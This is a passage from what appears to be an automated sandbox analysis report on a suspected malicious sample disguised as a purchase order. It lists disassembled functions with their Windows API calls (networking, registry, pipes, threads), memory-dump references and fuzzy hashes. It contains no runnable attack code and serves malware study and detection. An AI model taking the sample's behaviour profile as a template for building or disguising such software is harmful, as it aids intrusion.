                          • SendMessageW.USER32(00000000,000000F0,00000000,00000000), ref: 00F92E1C
                          • GetWindowLongW.USER32(00000000,000000F0), ref: 00F92E4F
                          • GetWindowLongW.USER32(00000000,000000F0), ref: 00F92E84
                          • SendMessageW.USER32(00000000,000000F1,00000000,00000000), ref: 00F92EB6
                          • SendMessageW.USER32(00000000,000000F1,00000001,00000000), ref: 00F92EE0
                          • GetWindowLongW.USER32(00000000,000000F0), ref: 00F92EF1
                          • SetWindowLongW.USER32(00000000,000000F0,00000000), ref: 00F92F0B
                          Memory Dump Source
                          • Source File: 00000000.00000002.1657459667.0000000000F01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F00000, based on PE: true
                          • Associated: 00000000.00000002.1657434324.0000000000F00000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1657517581.0000000000F9C000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1657517581.0000000000FC2000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1657569007.0000000000FCC000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1657589937.0000000000FD4000.00000002.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_f00000_PO_987654345678.jbxd
                          Similarity
                          • API ID: LongWindow$MessageSend
                          • String ID:
                          • API String ID: 2178440468-0
                          • Opcode ID: f8aae5a248f9a36b2e4bdad3d0395da60bacb467724a87ae3272868f5043aa90
                          • Instruction ID: a95ac0fe73b3826717d155509d0f4eadb8f44a6512187244ccf974ee39e53d83
                          • Opcode Fuzzy Hash: f8aae5a248f9a36b2e4bdad3d0395da60bacb467724a87ae3272868f5043aa90
                          • Instruction Fuzzy Hash: B0310235A05258AFEF61DF58DCD4F6537E1FB8A720F1501A6FA048B2B2CB71A840EB51
                          Function 00F67726 Relevance: 10.6, APIs: 7, Instructions: 94memoryCOMMON
                          Download Yara Rule
                          APIs
                          • MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,00000000,00000000), ref: 00F67769
                          • MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,00000000,00000000), ref: 00F6778F
                          • SysAllocString.OLEAUT32(00000000), ref: 00F67792
                          • SysAllocString.OLEAUT32(?), ref: 00F677B0
                          • SysFreeString.OLEAUT32(?), ref: 00F677B9
                          • StringFromGUID2.OLE32(?,?,00000028), ref: 00F677DE
                          • SysAllocString.OLEAUT32(?), ref: 00F677EC
                          Memory Dump Source
                          • Source File: 00000000.00000002.1657459667.0000000000F01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F00000, based on PE: true
                          • Associated: 00000000.00000002.1657434324.0000000000F00000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1657517581.0000000000F9C000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1657517581.0000000000FC2000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1657569007.0000000000FCC000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1657589937.0000000000FD4000.00000002.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_f00000_PO_987654345678.jbxd
                          Similarity
                          • API ID: String$Alloc$ByteCharMultiWide$FreeFrom
                          • String ID:
                          • API String ID: 3761583154-0
                          • Opcode ID: 276104fb5c1f99c6af7d217fc0e649cd1f852659c9abdcc7ad34509e868d3865
                          • Instruction ID: 5598e441bf64b30fc0939c2e51c67d8b34a63fc1ab1edd6286016b2f746c5176
                          • Opcode Fuzzy Hash: 276104fb5c1f99c6af7d217fc0e649cd1f852659c9abdcc7ad34509e868d3865
                          • Instruction Fuzzy Hash: 9021C176A08219AFDF10EFACCD88DBB77ACEB093687048026FA04DB150D674DC41A7A4
                          Function 00F677FD Relevance: 10.6, APIs: 7, Instructions: 89memoryCOMMON
                          Download Yara Rule
                          APIs
                          • MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,00000000,00000000), ref: 00F67842
                          • MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,00000000,00000000), ref: 00F67868
                          • SysAllocString.OLEAUT32(00000000), ref: 00F6786B
                          • SysAllocString.OLEAUT32 ref: 00F6788C
                          • SysFreeString.OLEAUT32 ref: 00F67895
                          • StringFromGUID2.OLE32(?,?,00000028), ref: 00F678AF
                          • SysAllocString.OLEAUT32(?), ref: 00F678BD
                          Memory Dump Source
                          • Source File: 00000000.00000002.1657459667.0000000000F01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F00000, based on PE: true
                          • Associated: 00000000.00000002.1657434324.0000000000F00000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1657517581.0000000000F9C000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1657517581.0000000000FC2000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1657569007.0000000000FCC000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1657589937.0000000000FD4000.00000002.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_f00000_PO_987654345678.jbxd
                          Similarity
                          • API ID: String$Alloc$ByteCharMultiWide$FreeFrom
                          • String ID:
                          • API String ID: 3761583154-0
                          • Opcode ID: a924ba2481d8f9e73be494c9bd4b61836851b2abb02f6cd19b95f8257427c48d
                          • Instruction ID: 6761145b2305fb811bfa495ddcc024a5d90c7d9b8cc8a89e3ff81989261a7747
                          • Opcode Fuzzy Hash: a924ba2481d8f9e73be494c9bd4b61836851b2abb02f6cd19b95f8257427c48d
                          • Instruction Fuzzy Hash: AC214735A04308AFDB10AFBCDC88DAA77ECEB097647248125F915CB1A5D674DC81DB64
                          Function 00F704D2 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 80pipeCOMMON
                          Download Yara Rule
                          APIs
                          • GetStdHandle.KERNEL32(0000000C), ref: 00F704F2
                          • CreatePipe.KERNEL32(?,?,0000000C,00000000), ref: 00F7052E
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.1657459667.0000000000F01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F00000, based on PE: true
                          • Associated: 00000000.00000002.1657434324.0000000000F00000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1657517581.0000000000F9C000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1657517581.0000000000FC2000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1657569007.0000000000FCC000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1657589937.0000000000FD4000.00000002.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_f00000_PO_987654345678.jbxd
                          Similarity
                          • API ID: CreateHandlePipe
                          • String ID: nul
                          • API String ID: 1424370930-2873401336
                          • Opcode ID: 8d8051c24323efc247726f6c3835197fe61e0520aea35bccd3a9a04be451b7b3
                          • Instruction ID: f1739c4053db2d81cef4dda456a1767a7c5c394a8d85f7049a5db9343c984ed1
                          • Opcode Fuzzy Hash: 8d8051c24323efc247726f6c3835197fe61e0520aea35bccd3a9a04be451b7b3
                          • Instruction Fuzzy Hash: 05217175900305EFDB209F29DC45A9A7BB4AF44734F248A1AF8A5D72E0DB70D940EF61
                          Function 00F705A7 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 80pipeCOMMON
                          Download Yara Rule
                          APIs
                          • GetStdHandle.KERNEL32(000000F6), ref: 00F705C6
                          • CreatePipe.KERNEL32(?,?,0000000C,00000000), ref: 00F70601
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.1657459667.0000000000F01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F00000, based on PE: true
                          • Associated: 00000000.00000002.1657434324.0000000000F00000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1657517581.0000000000F9C000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1657517581.0000000000FC2000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1657569007.0000000000FCC000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1657589937.0000000000FD4000.00000002.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_f00000_PO_987654345678.jbxd
                          Similarity
                          • API ID: CreateHandlePipe
                          • String ID: nul
                          • API String ID: 1424370930-2873401336
                          • Opcode ID: 6018872b6346ef1d1a576e037bea61ea961ae2d3ce0859e417ec1b01986a29bf
                          • Instruction ID: 40301c1a24f1ad497f28b8234954ebb4219151fb78f7ef0bdfcc3f388dab6b1a
                          • Opcode Fuzzy Hash: 6018872b6346ef1d1a576e037bea61ea961ae2d3ce0859e417ec1b01986a29bf
                          • Instruction Fuzzy Hash: 2021B575900305DBDB209F69CC54A5A77E4BF85730F208B1BF8A5E72D0DB709860EB61
                          Function 00F940AD Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 75windowCOMMON
                          Download Yara Rule
                          APIs
                            • Part of subcall function 00F0600E: CreateWindowExW.USER32(?,?,?,?,?,?,?,?,?,?,00000000,?), ref: 00F0604C
                            • Part of subcall function 00F0600E: GetStockObject.GDI32(00000011), ref: 00F06060
                            • Part of subcall function 00F0600E: SendMessageW.USER32(00000000,00000030,00000000), ref: 00F0606A
                          • SendMessageW.USER32(00000000,00002001,00000000,FF000000), ref: 00F94112
                          • SendMessageW.USER32(?,00000409,00000000,FF000000), ref: 00F9411F
                          • SendMessageW.USER32(?,00000402,00000000,00000000), ref: 00F9412A
                          • SendMessageW.USER32(?,00000401,00000000,00640000), ref: 00F94139
                          • SendMessageW.USER32(?,00000404,00000001,00000000), ref: 00F94145
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.1657459667.0000000000F01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F00000, based on PE: true
                          • Associated: 00000000.00000002.1657434324.0000000000F00000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1657517581.0000000000F9C000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1657517581.0000000000FC2000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1657569007.0000000000FCC000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1657589937.0000000000FD4000.00000002.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_f00000_PO_987654345678.jbxd
                          Similarity
                          • API ID: MessageSend$CreateObjectStockWindow
                          • String ID: Msctls_Progress32
                          • API String ID: 1025951953-3636473452
                          • Opcode ID: 8f03e729264811b8e3ca711bda371e22eaa1877972c72fae9175d01bfea72828
                          • Instruction ID: 17f24920587ff413824d789e5c8f5063b042bbbfd8dc8f826e2b483c937c452b
                          • Opcode Fuzzy Hash: 8f03e729264811b8e3ca711bda371e22eaa1877972c72fae9175d01bfea72828
                          • Instruction Fuzzy Hash: A31193B214021D7EFF119F64CC85EE77F5DEF187A8F004111B618A20A0C6769C61ABA4
                          Function 00F3D7DF Relevance: 10.6, APIs: 7, Instructions: 65COMMONLIBRARYCODE
                          Download Yara Rule
                          APIs
                            • Part of subcall function 00F3D7A3: _free.LIBCMT ref: 00F3D7CC
                          • _free.LIBCMT ref: 00F3D82D
                            • Part of subcall function 00F329C8: RtlFreeHeap.NTDLL(00000000,00000000,?,00F3D7D1,00000000,00000000,00000000,00000000,?,00F3D7F8,00000000,00000007,00000000,?,00F3DBF5,00000000), ref: 00F329DE
                            • Part of subcall function 00F329C8: GetLastError.KERNEL32(00000000,?,00F3D7D1,00000000,00000000,00000000,00000000,?,00F3D7F8,00000000,00000007,00000000,?,00F3DBF5,00000000,00000000), ref: 00F329F0
                          • _free.LIBCMT ref: 00F3D838
                          • _free.LIBCMT ref: 00F3D843
                          • _free.LIBCMT ref: 00F3D897
                          • _free.LIBCMT ref: 00F3D8A2
                          • _free.LIBCMT ref: 00F3D8AD
                          • _free.LIBCMT ref: 00F3D8B8
                          Memory Dump Source
                          • Source File: 00000000.00000002.1657459667.0000000000F01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F00000, based on PE: true
                          • Associated: 00000000.00000002.1657434324.0000000000F00000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1657517581.0000000000F9C000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1657517581.0000000000FC2000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1657569007.0000000000FCC000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1657589937.0000000000FD4000.00000002.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_f00000_PO_987654345678.jbxd
                          Similarity
                          • API ID: _free$ErrorFreeHeapLast
                          • String ID:
                          • API String ID: 776569668-0
                          • Opcode ID: d5e9bbcb1dbdafe4c8d3bd98f36014f41f46dc5d4a3df644b036f3c2391e0fc8
                          • Instruction ID: 82b64028526ad951a29b951b70d79b2b22278ccd2c0c3e83ac0e9dd9a55a4ce1
                          • Opcode Fuzzy Hash: d5e9bbcb1dbdafe4c8d3bd98f36014f41f46dc5d4a3df644b036f3c2391e0fc8
                          • Instruction Fuzzy Hash: 8C116071941B14BAD621BFF0EC47FCB7BECAF00720F400825B699A6292DA7DB505B760
                          Function 00F6DA5A Relevance: 10.5, APIs: 5, Strings: 1, Instructions: 46windowCOMMON
                          Download Yara Rule
                          APIs
                          • GetModuleHandleW.KERNEL32(00000000,?,?,00000100,00000000), ref: 00F6DA74
                          • LoadStringW.USER32(00000000), ref: 00F6DA7B
                          • GetModuleHandleW.KERNEL32(00000000,00001389,?,00000100), ref: 00F6DA91
                          • LoadStringW.USER32(00000000), ref: 00F6DA98
                          • MessageBoxW.USER32(00000000,?,?,00011010), ref: 00F6DADC
                          Strings
                          • %s (%d) : ==> %s: %s %s, xrefs: 00F6DAB9
                          Memory Dump Source
                          • Source File: 00000000.00000002.1657459667.0000000000F01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F00000, based on PE: true
                          • Associated: 00000000.00000002.1657434324.0000000000F00000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1657517581.0000000000F9C000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1657517581.0000000000FC2000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1657569007.0000000000FCC000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1657589937.0000000000FD4000.00000002.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_f00000_PO_987654345678.jbxd
                          Similarity
                          • API ID: HandleLoadModuleString$Message
                          • String ID: %s (%d) : ==> %s: %s %s
                          • API String ID: 4072794657-3128320259
                          • Opcode ID: cb95e60017aaeb7814644ec1add739a215ec6cc2078d096febd9926889333e20
                          • Instruction ID: 6c64f52b851789a54b53d98b62d4debec262976fe45d7b4a3f7d5afba0155104
                          • Opcode Fuzzy Hash: cb95e60017aaeb7814644ec1add739a215ec6cc2078d096febd9926889333e20
                          • Instruction Fuzzy Hash: B50162F290420C7FEB10EBE09D89EE7366CE708701F400496B706E2042E6749E845FB5
                          Function 00F7096B Relevance: 10.5, APIs: 7, Instructions: 35synchronizationthreadCOMMON
                          Download Yara Rule
                          APIs
                          • InterlockedExchange.KERNEL32(0123EBA8,0123EBA8), ref: 00F7097B
                          • EnterCriticalSection.KERNEL32(0123EB88,00000000), ref: 00F7098D
                          • TerminateThread.KERNEL32(00540050,000001F6), ref: 00F7099B
                          • WaitForSingleObject.KERNEL32(00540050,000003E8), ref: 00F709A9
                          • CloseHandle.KERNEL32(00540050), ref: 00F709B8
                          • InterlockedExchange.KERNEL32(0123EBA8,000001F6), ref: 00F709C8
                          • LeaveCriticalSection.KERNEL32(0123EB88), ref: 00F709CF
                          Memory Dump Source
                          • Source File: 00000000.00000002.1657459667.0000000000F01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F00000, based on PE: true
                          • Associated: 00000000.00000002.1657434324.0000000000F00000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1657517581.0000000000F9C000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1657517581.0000000000FC2000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1657569007.0000000000FCC000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1657589937.0000000000FD4000.00000002.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_f00000_PO_987654345678.jbxd
                          Similarity
                          • API ID: CriticalExchangeInterlockedSection$CloseEnterHandleLeaveObjectSingleTerminateThreadWait
                          • String ID:
                          • API String ID: 3495660284-0
                          • Opcode ID: 7a971a79af0f386e310affb30b39ea3d01bc476aa460bffc716856e766b1c932
                          • Instruction ID: 9e7b0993b15e74f1699c31184181317087259852996b5cafe4900e72bab2eb90
                          • Opcode Fuzzy Hash: 7a971a79af0f386e310affb30b39ea3d01bc476aa460bffc716856e766b1c932
                          • Instruction Fuzzy Hash: EDF0CD31842916FBD7515BA4EE89AD67A35BF05712F801027F201508A1CB75A465EFE0
                          Function 00F05D0A Relevance: 9.3, APIs: 6, Instructions: 276COMMON
                          Download Yara Rule
                          APIs
                          • GetClientRect.USER32(?,?), ref: 00F05D30
                          • GetWindowRect.USER32(?,?), ref: 00F05D71
                          • ScreenToClient.USER32(?,?), ref: 00F05D99
                          • GetClientRect.USER32(?,?), ref: 00F05ED7
                          • GetWindowRect.USER32(?,?), ref: 00F05EF8
                          Memory Dump Source
                          • Source File: 00000000.00000002.1657459667.0000000000F01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F00000, based on PE: true
                          • Associated: 00000000.00000002.1657434324.0000000000F00000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1657517581.0000000000F9C000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1657517581.0000000000FC2000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1657569007.0000000000FCC000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1657589937.0000000000FD4000.00000002.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_f00000_PO_987654345678.jbxd
                          Similarity
                          • API ID: Rect$Client$Window$Screen
                          • String ID:
                          • API String ID: 1296646539-0
                          • Opcode ID: 7762a41ca632abe3f4cd7ad5a37a416f38ac51fde4ae8b766b73e8582cb6bd25
                          • Instruction ID: 0344c20e5a01e0fa6e3d470e7da3d67f8fcf5d7fb7874191b61d435001619d6e
                          • Opcode Fuzzy Hash: 7762a41ca632abe3f4cd7ad5a37a416f38ac51fde4ae8b766b73e8582cb6bd25
                          • Instruction Fuzzy Hash: 98B15B35A0064ADBDB14CFA9C4407EEBBF1FF58310F14841AE8A9E7290DB74AA51EF54
                          Function 00F301B7 Relevance: 9.3, APIs: 6, Instructions: 269COMMON
                          Download Yara Rule
                          APIs
                          • __allrem.LIBCMT ref: 00F300BA
                          • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 00F300D6
                          • __allrem.LIBCMT ref: 00F300ED
                          • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 00F3010B
                          • __allrem.LIBCMT ref: 00F30122
                          • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 00F30140
                          Memory Dump Source
                          • Source File: 00000000.00000002.1657459667.0000000000F01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F00000, based on PE: true
                          • Associated: 00000000.00000002.1657434324.0000000000F00000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1657517581.0000000000F9C000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1657517581.0000000000FC2000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1657569007.0000000000FCC000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1657589937.0000000000FD4000.00000002.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_f00000_PO_987654345678.jbxd
                          Similarity
                          • API ID: Unothrow_t@std@@@__allrem__ehfuncinfo$??2@
                          • String ID:
                          • API String ID: 1992179935-0
                          • Opcode ID: c0aa086816e9a6b10c8594d9af3fc1b6618250ddc70608c46d0048b3e4fbc764
                          • Instruction ID: b151cec045b01567b1c395b9ed02a3c30887132bdeffbdd3a96d948fbf5259f3
                          • Opcode Fuzzy Hash: c0aa086816e9a6b10c8594d9af3fc1b6618250ddc70608c46d0048b3e4fbc764
                          • Instruction Fuzzy Hash: 18812672A007169BE724AF28DC51B6B73F8AF41730F24423AF951DB681EB74D904A790
                          Function 00F81D10 Relevance: 9.3, APIs: 6, Instructions: 254networkCOMMON
                          Download Yara Rule
                          APIs
                            • Part of subcall function 00F83149: select.WSOCK32(00000000,?,00000000,00000000,?,?,?,00000000,?,?,?,00F8101C,00000000,?,?,00000000), ref: 00F83195
                          • __WSAFDIsSet.WSOCK32(00000000,?,00000000,00000000,?,00000064,00000000), ref: 00F81DC0
                          • #17.WSOCK32(00000000,?,?,00000000,?,00000010), ref: 00F81DE1
                          • WSAGetLastError.WSOCK32 ref: 00F81DF2
                          • inet_ntoa.WSOCK32(?), ref: 00F81E8C
                          • htons.WSOCK32(?,?,?,?,?), ref: 00F81EDB
                          • _strlen.LIBCMT ref: 00F81F35
                            • Part of subcall function 00F639E8: _strlen.LIBCMT ref: 00F639F2
                            • Part of subcall function 00F06D9E: MultiByteToWideChar.KERNEL32(00000000,00000001,?,?,00000000,00000000,00000002,?,?,?,?,00F1CF58,?,?,?), ref: 00F06DBA
                            • Part of subcall function 00F06D9E: MultiByteToWideChar.KERNEL32(00000000,00000001,?,?,00000000,?,?,?,00F1CF58,?,?,?), ref: 00F06DED
                          Memory Dump Source
                          • Source File: 00000000.00000002.1657459667.0000000000F01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F00000, based on PE: true
                          • Associated: 00000000.00000002.1657434324.0000000000F00000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1657517581.0000000000F9C000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1657517581.0000000000FC2000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1657569007.0000000000FCC000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1657589937.0000000000FD4000.00000002.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_f00000_PO_987654345678.jbxd
                          Similarity
                          • API ID: ByteCharMultiWide_strlen$ErrorLasthtonsinet_ntoaselect
                          • String ID:
                          • API String ID: 1923757996-0
                          • Opcode ID: 13ec7813eec5e72a5f3966b3b86794c650faee33b0f32bad3e89b22a9167b467
                          • Instruction ID: 63b65442a0c8885538c4f30499a35d85629411ffdd25275de0a494fc60872ccf
                          • Opcode Fuzzy Hash: 13ec7813eec5e72a5f3966b3b86794c650faee33b0f32bad3e89b22a9167b467
                          • Instruction Fuzzy Hash: F0A1BF31604300AFC324EB24CC85FAA77A9BF84318F548A4CF5565B2E2DB75ED46EB91
                          Function 00F361FE Relevance: 9.2, APIs: 6, Instructions: 216COMMON
                          Download Yara Rule
                          APIs
                          • MultiByteToWideChar.KERNEL32(00000001,00000000,?,?,00000000,00000000,?,00F282D9,00F282D9,?,?,?,00F3644F,00000001,00000001,8BE85006), ref: 00F36258
                          • MultiByteToWideChar.KERNEL32(00000001,00000001,?,?,00000000,?,?,?,?,00F3644F,00000001,00000001,8BE85006,?,?,?), ref: 00F362DE
                          • WideCharToMultiByte.KERNEL32(00000001,00000000,00000000,00000000,?,8BE85006,00000000,00000000,?,00000400,00000000,?,00000000,00000000,00000000,00000000), ref: 00F363D8
                          • __freea.LIBCMT ref: 00F363E5
                            • Part of subcall function 00F33820: RtlAllocateHeap.NTDLL(00000000,?,00FD1444,?,00F1FDF5,?,?,00F0A976,00000010,00FD1440,00F013FC,?,00F013C6,?,00F01129), ref: 00F33852
                          • __freea.LIBCMT ref: 00F363EE
                          • __freea.LIBCMT ref: 00F36413
                          Memory Dump Source
                          • Source File: 00000000.00000002.1657459667.0000000000F01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F00000, based on PE: true
                          • Associated: 00000000.00000002.1657434324.0000000000F00000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1657517581.0000000000F9C000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1657517581.0000000000FC2000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1657569007.0000000000FCC000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1657589937.0000000000FD4000.00000002.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_f00000_PO_987654345678.jbxd
                          Similarity
                          • API ID: ByteCharMultiWide__freea$AllocateHeap
                          • String ID:
                          • API String ID: 1414292761-0
                          • Opcode ID: 9191ad8d30961c8d826758253fab35d3eef3e94f75734ed8dbe10c7003b10299
                          • Instruction ID: ed0466a5fc05b2cc17c90f32f6d1ec4c3ac9465f2fabf7511b620d39d6d35f05
                          • Opcode Fuzzy Hash: 9191ad8d30961c8d826758253fab35d3eef3e94f75734ed8dbe10c7003b10299
                          • Instruction Fuzzy Hash: 43519073A00216BBDF258F64DC81EAF7BA9EB44770F158629FC05D6241DB38DC44E6A0
                          Function 00F8BBDB Relevance: 9.2, APIs: 6, Instructions: 191registryCOMMON
                          Download Yara Rule
                          APIs
                            • Part of subcall function 00F09CB3: _wcslen.LIBCMT ref: 00F09CBD
                            • Part of subcall function 00F8C998: CharUpperBuffW.USER32(?,?,?,?,?,?,?,00F8B6AE,?,?), ref: 00F8C9B5
                            • Part of subcall function 00F8C998: _wcslen.LIBCMT ref: 00F8C9F1
                            • Part of subcall function 00F8C998: _wcslen.LIBCMT ref: 00F8CA68
                            • Part of subcall function 00F8C998: _wcslen.LIBCMT ref: 00F8CA9E
                          • RegConnectRegistryW.ADVAPI32(?,?,?), ref: 00F8BCCA
                          • RegOpenKeyExW.ADVAPI32(?,?,00000000,?,?), ref: 00F8BD25
                          • RegCloseKey.ADVAPI32(00000000), ref: 00F8BD6A
                          • RegEnumValueW.ADVAPI32(?,-00000001,?,?,00000000,?,00000000,00000000), ref: 00F8BD99
                          • RegCloseKey.ADVAPI32(?,?,00000000), ref: 00F8BDF3
                          • RegCloseKey.ADVAPI32(?), ref: 00F8BDFF
                          Memory Dump Source
                          • Source File: 00000000.00000002.1657459667.0000000000F01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F00000, based on PE: true
                          • Associated: 00000000.00000002.1657434324.0000000000F00000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1657517581.0000000000F9C000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1657517581.0000000000FC2000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1657569007.0000000000FCC000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1657589937.0000000000FD4000.00000002.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_f00000_PO_987654345678.jbxd
                          Similarity
                          • API ID: _wcslen$Close$BuffCharConnectEnumOpenRegistryUpperValue
                          • String ID:
                          • API String ID: 1120388591-0
                          • Opcode ID: 86ea7b2369e48a270b042fed92558088f0cc0130130f83ba2a80411553092c6a
                          • Instruction ID: 71b144ae6473d3a7d2c02cdd07dba18d1463b296b119aad0c15b164537ca35a5
                          • Opcode Fuzzy Hash: 86ea7b2369e48a270b042fed92558088f0cc0130130f83ba2a80411553092c6a
                          • Instruction Fuzzy Hash: E281DE31608241EFD714EF24C885E6ABBE5FF84318F14895CF4598B2A2DB31ED45EB92
                          Function 00F5F7AD Relevance: 9.2, APIs: 6, Instructions: 183memoryCOMMON
                          Download Yara Rule
                          APIs
                          • VariantInit.OLEAUT32(00000035), ref: 00F5F7B9
                          • SysAllocString.OLEAUT32(00000001), ref: 00F5F860
                          • VariantCopy.OLEAUT32(00F5FA64,00000000), ref: 00F5F889
                          • VariantClear.OLEAUT32(00F5FA64), ref: 00F5F8AD
                          • VariantCopy.OLEAUT32(00F5FA64,00000000), ref: 00F5F8B1
                          • VariantClear.OLEAUT32(?), ref: 00F5F8BB
                          Memory Dump Source
